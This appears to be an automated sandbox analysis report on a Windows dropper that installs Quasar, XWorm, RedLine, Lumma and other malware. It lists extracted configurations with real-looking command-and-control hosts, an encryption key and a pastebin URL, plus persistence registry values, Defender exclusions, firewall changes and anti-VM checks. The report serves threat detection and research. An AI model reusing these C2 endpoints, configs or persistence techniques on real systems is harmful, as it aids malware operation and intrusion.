Resubmissions
27/02/2025, 06:33
250227-hbn4tszmx7 1026/02/2025, 23:57
250226-3zn4ysxwc1 1026/02/2025, 23:14
250226-271x2sxmz9 1014/02/2025, 01:10
250214-bjsnnayne1 1014/02/2025, 01:00
250214-bc5pmsymhw 1013/02/2025, 05:01
250213-fnkwtstpgw 1013/02/2025, 04:24
250213-e1kk6atmaz 1013/02/2025, 04:08
250213-eqe8patkgx 812/02/2025, 23:56
250212-3yzt3azrdx 10Analysis
-
max time kernel
299s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
26/02/2025, 23:57
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe
Resource
win10v2004-20250217-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
quasar
1.4.1
dilly
lvke-45989.portmap.host:45989
0cb49dc2-fd0d-4581-ae1e-04154c41f310
-
encryption_key
E5250226804167CB0B1B4B0E9667D0C056694DCA
-
install_name
defenderx64.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Defender Helper
-
subdirectory
en
Extracted
xworm
-
Install_directory
%AppData%
-
install_file
XClient.exe
-
pastebin_url
https://pastebin.com/raw/RpncwxSs
Extracted
redline
30072024
185.215.113.67:40960
Extracted
lumma
https://collapimga.fun/api
Signatures
-
Asyncrat family
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x0007000000023da1-244.dat family_xworm behavioral1/memory/2936-249-0x00000000007A0000-0x00000000007B8000-memory.dmp family_xworm behavioral1/files/0x0011000000023b7d-589.dat family_xworm -
Lumma family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\boot.exe,C:\\Program Files (x86)\\CSMClient\\CyberStation.exe," reg.exe -
Phorphiex family
-
Phorphiex payload 1 IoCs
resource yara_rule behavioral1/files/0x0009000000023fa1-3096.dat family_phorphiex -
Quasar family
-
Quasar payload 7 IoCs
resource yara_rule behavioral1/files/0x0008000000023d2a-185.dat family_quasar behavioral1/memory/2644-206-0x0000000000500000-0x0000000000824000-memory.dmp family_quasar behavioral1/files/0x00030000000231de-1063.dat family_quasar behavioral1/files/0x0002000000023330-1079.dat family_quasar behavioral1/files/0x0007000000023e32-1141.dat family_quasar behavioral1/files/0x0002000000023316-1599.dat family_quasar behavioral1/files/0x000d000000023f85-3409.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral1/files/0x0007000000023da6-256.dat family_redline behavioral1/memory/4560-261-0x0000000000980000-0x00000000009D2000-memory.dmp family_redline behavioral1/files/0x0007000000023e4e-1191.dat family_redline behavioral1/files/0x0008000000023f96-3007.dat family_redline -
Redline family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
description pid Process procid_target PID 3028 created 3400 3028 T3.exe 55 PID 3028 created 3400 3028 T3.exe 55 PID 3028 created 3400 3028 T3.exe 55 PID 3028 created 3400 3028 T3.exe 55 PID 3028 created 3400 3028 T3.exe 55 PID 3028 created 3400 3028 T3.exe 55 PID 3028 created 3400 3028 T3.exe 55 PID 3028 created 3400 3028 T3.exe 55 -
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x000a000000023f89-2892.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3368 powershell.exe 3076 powershell.exe 2204 powershell.exe 4452 powershell.exe 4484 powershell.exe 4240 powershell.exe -
Downloads MZ/PE file 48 IoCs
flow pid Process 365 6016 pei.exe 315 1012 4363463463464363463463463.exe 324 1012 4363463463464363463463463.exe 44 1012 4363463463464363463463463.exe 44 1012 4363463463464363463463463.exe 44 1012 4363463463464363463463463.exe 204 1012 4363463463464363463463463.exe 212 5932 wget.exe 255 5568 wget.exe 259 5620 wget.exe 268 1900 wget.exe 280 6140 wget.exe 281 5396 wget.exe 85 1012 4363463463464363463463463.exe 85 1012 4363463463464363463463463.exe 85 1012 4363463463464363463463463.exe 85 1012 4363463463464363463463463.exe 270 5888 WallpaperX.exe 270 5888 WallpaperX.exe 270 5888 WallpaperX.exe 270 5888 WallpaperX.exe 408 1980 654932175.exe 408 1980 654932175.exe 408 1980 654932175.exe 408 1980 654932175.exe 408 1980 654932175.exe 408 1980 654932175.exe 408 1980 654932175.exe 408 1980 654932175.exe 175 1012 4363463463464363463463463.exe 210 760 wget.exe 256 1900 wget.exe 405 1012 4363463463464363463463463.exe 53 1012 4363463463464363463463463.exe 277 2940 wget.exe 356 1012 4363463463464363463463463.exe 38 1012 4363463463464363463463463.exe 38 1012 4363463463464363463463463.exe 38 1012 4363463463464363463463463.exe 38 1012 4363463463464363463463463.exe 38 1012 4363463463464363463463463.exe 38 1012 4363463463464363463463463.exe 38 1012 4363463463464363463463463.exe 38 1012 4363463463464363463463463.exe 38 1012 4363463463464363463463463.exe 38 1012 4363463463464363463463463.exe 38 1012 4363463463464363463463463.exe 38 1012 4363463463464363463463463.exe -
Modifies Windows Firewall 2 TTPs 3 IoCs
pid Process 6932 netsh.exe 3884 netsh.exe 3380 netsh.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 5168 icacls.exe 2036 icacls.exe 5784 takeown.exe 4864 icacls.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe -
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation MePaxil.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation boot.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 543030932.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation build6_unencrypted.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation crypteda.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 1459321940.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation XClient.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation run2.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation del.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 719412645.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Loader.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation run.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation wallx.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 218153347.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 478020023.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation 2klz.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation defenderx64.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Svchost.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe -
Executes dropped EXE 64 IoCs
pid Process 2332 Stub.exe 4356 Stub.exe 2644 defender64.exe 2936 XClient.exe 4560 30072024.exe 3604 defenderx64.exe 2620 random.exe 928 Reaper%20cfx%20Spoofer%20V2.exe 548 cfx.exe 1232 defenderx64.exe 3428 kmvcsaed.exe 4784 Loader.exe 4220 defenderx64.exe 4432 defenderx64.exe 3788 build6_unencrypted.exe 1092 defenderx64.exe 760 XClient.exe 4344 defenderx64.exe 5264 2klz.exe 5216 2klz.exe 5140 Discord.exe 5524 powerstealer.exe 5592 defenderx64.exe 5428 ardara.exe 5292 Client.exe 5164 MePaxil.exe 1500 anticheat.exe 5708 2klz.exe 5848 Legend.pif 3876 defenderx64.exe 5452 boot.exe 760 wget.exe 5932 wget.exe 5320 defenderx64.exe 5348 2klz.exe 5568 wget.exe 5732 defenderx64.exe 1900 wget.exe 5152 2klz.exe 3496 run.exe 1236 run2.exe 5620 wget.exe 5132 wallx.exe 1900 wget.exe 5888 WallpaperX.exe 5652 XClient.exe 2592 roblox1.exe 5392 Windows.exe 1468 stub.exe 6132 2klz.exe 5300 defenderx64.exe 1496 Client-built.exe 2940 wget.exe 5352 Svchost.exe 6140 wget.exe 5396 wget.exe 4340 2klz.exe 2332 RegAsm.exe 5456 defenderx64.exe 5352 Svchost.exe 5380 FixCSM.exe 1172 RegAsm.exe 5536 2klz.exe 5688 defenderx64.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine random.exe -
Loads dropped DLL 64 IoCs
pid Process 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 1468 stub.exe 1468 stub.exe 1468 stub.exe 1468 stub.exe 1468 stub.exe 1468 stub.exe 1468 stub.exe 1468 stub.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 5784 takeown.exe 4864 icacls.exe 5168 icacls.exe 2036 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Reaper%20cfx%20Spoofer%20V2.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\Loader.exe\"" Loader.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" 1547117288.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 7088 cmd.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow ioc 37 raw.githubusercontent.com 58 discord.com 79 pastebin.com 237 raw.githubusercontent.com 38 raw.githubusercontent.com 59 discord.com 60 raw.githubusercontent.com 78 pastebin.com 114 discord.com 238 raw.githubusercontent.com -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 46 api.ipify.org 90 api.ipify.org 91 ip-api.com 95 api.ipify.org 103 api.ipify.org 45 api.ipify.org -
Drops autorun.inf file 1 TTPs 2 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created C:\autorun.inf Loader.exe File created F:\autorun.inf Loader.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\windows\system32\boot.exe cmd.exe File created C:\Windows\System32\del.exe wget.exe File opened for modification C:\Windows\System32\del.exe wget.exe File created C:\windows\system32\boot.exe cmd.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 1108 tasklist.exe 5556 tasklist.exe 5780 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 4444 cmd.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\images\\hinhnen.jpg" WallpaperX.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2620 random.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3028 set thread context of 6944 3028 T3.exe 582 -
resource yara_rule behavioral1/files/0x0007000000023d8e-105.dat upx behavioral1/memory/4356-109-0x00007FF84BAE0000-0x00007FF84C0CA000-memory.dmp upx behavioral1/memory/4356-117-0x00007FF85BFB0000-0x00007FF85BFD3000-memory.dmp upx behavioral1/files/0x0007000000023d85-118.dat upx behavioral1/memory/4356-120-0x00007FF860640000-0x00007FF86064F000-memory.dmp upx behavioral1/files/0x0007000000023d6d-115.dat upx behavioral1/files/0x0007000000023d6c-119.dat upx behavioral1/files/0x0007000000023d71-122.dat upx behavioral1/memory/4356-125-0x00007FF85BF80000-0x00007FF85BFAD000-memory.dmp upx behavioral1/memory/4356-123-0x00007FF85C3B0000-0x00007FF85C3C9000-memory.dmp upx behavioral1/files/0x0007000000023d75-126.dat upx behavioral1/memory/4356-129-0x00007FF85BF60000-0x00007FF85BF79000-memory.dmp upx behavioral1/files/0x0007000000023d92-130.dat upx behavioral1/memory/4356-134-0x00007FF85FFC0000-0x00007FF85FFCD000-memory.dmp upx behavioral1/files/0x0007000000023d91-133.dat upx behavioral1/memory/4356-137-0x00007FF85BF30000-0x00007FF85BF5E000-memory.dmp upx behavioral1/files/0x0007000000023d90-139.dat upx behavioral1/memory/4356-141-0x00007FF84C710000-0x00007FF84C7CC000-memory.dmp upx behavioral1/files/0x0007000000023d95-142.dat upx behavioral1/memory/4356-144-0x00007FF8536C0000-0x00007FF8536EB000-memory.dmp upx behavioral1/files/0x0007000000023d8b-147.dat upx behavioral1/memory/4356-150-0x00007FF855B80000-0x00007FF855B9C000-memory.dmp upx behavioral1/memory/4356-149-0x00007FF84BAE0000-0x00007FF84C0CA000-memory.dmp upx behavioral1/files/0x0007000000023d77-151.dat upx behavioral1/memory/4356-155-0x00007FF84DCE0000-0x00007FF84DD0E000-memory.dmp upx behavioral1/memory/4356-154-0x00007FF85BFB0000-0x00007FF85BFD3000-memory.dmp upx behavioral1/files/0x0007000000023d86-156.dat upx behavioral1/memory/4356-158-0x00007FF84C650000-0x00007FF84C708000-memory.dmp upx behavioral1/files/0x0007000000023d84-153.dat upx behavioral1/memory/4356-161-0x00007FF84B760000-0x00007FF84BAD5000-memory.dmp upx behavioral1/files/0x0007000000023d70-164.dat upx behavioral1/memory/4356-166-0x00007FF84D5A0000-0x00007FF84D5B4000-memory.dmp upx behavioral1/memory/4356-165-0x00007FF85BF60000-0x00007FF85BF79000-memory.dmp upx behavioral1/files/0x0007000000023d94-176.dat upx behavioral1/memory/4356-180-0x00007FF84C480000-0x00007FF84C59C000-memory.dmp upx behavioral1/memory/4356-178-0x00007FF84D570000-0x00007FF84D594000-memory.dmp upx behavioral1/memory/4356-177-0x00007FF84C710000-0x00007FF84C7CC000-memory.dmp upx behavioral1/files/0x0007000000023d81-175.dat upx behavioral1/memory/4356-174-0x00007FF85C400000-0x00007FF85C40B000-memory.dmp upx behavioral1/memory/4356-173-0x00007FF85BF30000-0x00007FF85BF5E000-memory.dmp upx behavioral1/memory/4356-172-0x00007FF85C6B0000-0x00007FF85C6BD000-memory.dmp upx behavioral1/files/0x0007000000023d80-170.dat upx behavioral1/files/0x0007000000023d74-168.dat upx behavioral1/files/0x0007000000023d93-194.dat upx behavioral1/memory/4356-199-0x00007FF84B200000-0x00007FF84B36F000-memory.dmp upx behavioral1/memory/4356-197-0x00007FF84DCE0000-0x00007FF84DD0E000-memory.dmp upx behavioral1/memory/4356-193-0x00007FF84C450000-0x00007FF84C473000-memory.dmp upx behavioral1/files/0x0007000000023d76-190.dat upx behavioral1/memory/4356-229-0x00007FF84B760000-0x00007FF84BAD5000-memory.dmp upx behavioral1/memory/4356-230-0x00007FF8480A0000-0x00007FF8480BB000-memory.dmp upx behavioral1/memory/4356-228-0x00007FF848E90000-0x00007FF848EA4000-memory.dmp upx behavioral1/memory/4356-231-0x00007FF84D5A0000-0x00007FF84D5B4000-memory.dmp upx behavioral1/files/0x0007000000023d40-205.dat upx behavioral1/memory/4356-237-0x00007FF846BD0000-0x00007FF846BF9000-memory.dmp upx behavioral1/memory/4356-236-0x00007FF846C00000-0x00007FF846C16000-memory.dmp upx behavioral1/memory/4356-235-0x00007FF846C20000-0x00007FF846C2E000-memory.dmp upx behavioral1/memory/4356-234-0x00007FF846C70000-0x00007FF846C85000-memory.dmp upx behavioral1/memory/4356-250-0x00007FF84D570000-0x00007FF84D594000-memory.dmp upx behavioral1/memory/4356-233-0x00007FF846C30000-0x00007FF846C6E000-memory.dmp upx behavioral1/memory/4356-251-0x00007FF846020000-0x00007FF846272000-memory.dmp upx behavioral1/memory/4356-232-0x00007FF846C90000-0x00007FF846CA2000-memory.dmp upx behavioral1/memory/4356-227-0x00007FF848EB0000-0x00007FF848EC2000-memory.dmp upx behavioral1/memory/4356-226-0x00007FF848ED0000-0x00007FF848EE5000-memory.dmp upx behavioral1/memory/4356-225-0x00007FF848EF0000-0x00007FF848EFC000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files\Crashpad\metadata setup.exe File opened for modification C:\Program Files\Crashpad\settings.dat setup.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\sysnldcvmr.exe 1547117288.exe File opened for modification C:\Windows\sysnldcvmr.exe 1547117288.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4820 sc.exe 2908 sc.exe 3076 sc.exe 6176 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000a000000023cfc-10.dat pyinstaller -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral1/files/0x0008000000023dc3-567.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
